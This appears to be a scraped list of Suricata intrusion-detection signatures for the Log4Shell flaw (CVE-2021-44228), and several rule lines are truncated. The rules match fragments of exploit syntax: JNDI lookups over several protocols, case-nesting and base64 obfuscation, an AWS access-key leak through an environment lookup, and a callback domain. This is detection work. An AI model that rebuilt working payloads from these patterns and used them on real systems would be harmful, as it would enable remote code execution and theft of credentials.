Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee)"; dns.query; dotprefix; content:".rce.ee"; nocase; endswith; reference:url,www.fastly.com/blog/new-data-and-insights-into-log4shell-attacks-cve-2021-44228; reference:cve,2021-44228; classtype:domain-c2; sid:2034747; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034709; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034712; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034714; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034701; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001,
Suricata
ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response
ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response
Rule: alert tcp $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response"; flow:established,to_client; content:"|30 81|"; startswith; content:"|02 01|"; distance:1; within:2; content:"|64|"; distance:1; within:1; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0d|javaClassName"; within:20; fast_pattern; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0c|javaCodeBase"; within:19; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|objectClass"; within:18; content:"|04|"; distance:2; within:1; byte_jump:1,0,relative; content:"|04 0b|javaFactory"; within:18; reference:url,l
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034711; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034713; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|corba|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034715; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034707; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (CVE-2021-44228)"; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034717; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034708; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034710; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034716; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034700; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034706; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)
suricata·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034699; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_14, mitre_tactic_id TA0001, mitre
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228)
suricata·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034676; rev:1; metadata:attack_target Server, created_at 2021_12_13, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2023_06_05, mi
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228)
suricata·2021-12-12·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228)
Rule: alert udp any !51820 -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (udp) (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; within:100; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034674; rev:3; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2023_06_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228)
suricata·2021-12-12·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; within:100; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034673; rev:3; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034661; rev:2; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%24)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034659; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severit
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034667; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034660; rev:3; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CI
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034668; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034663; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034662; rev:3; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034664; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_02_16;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)
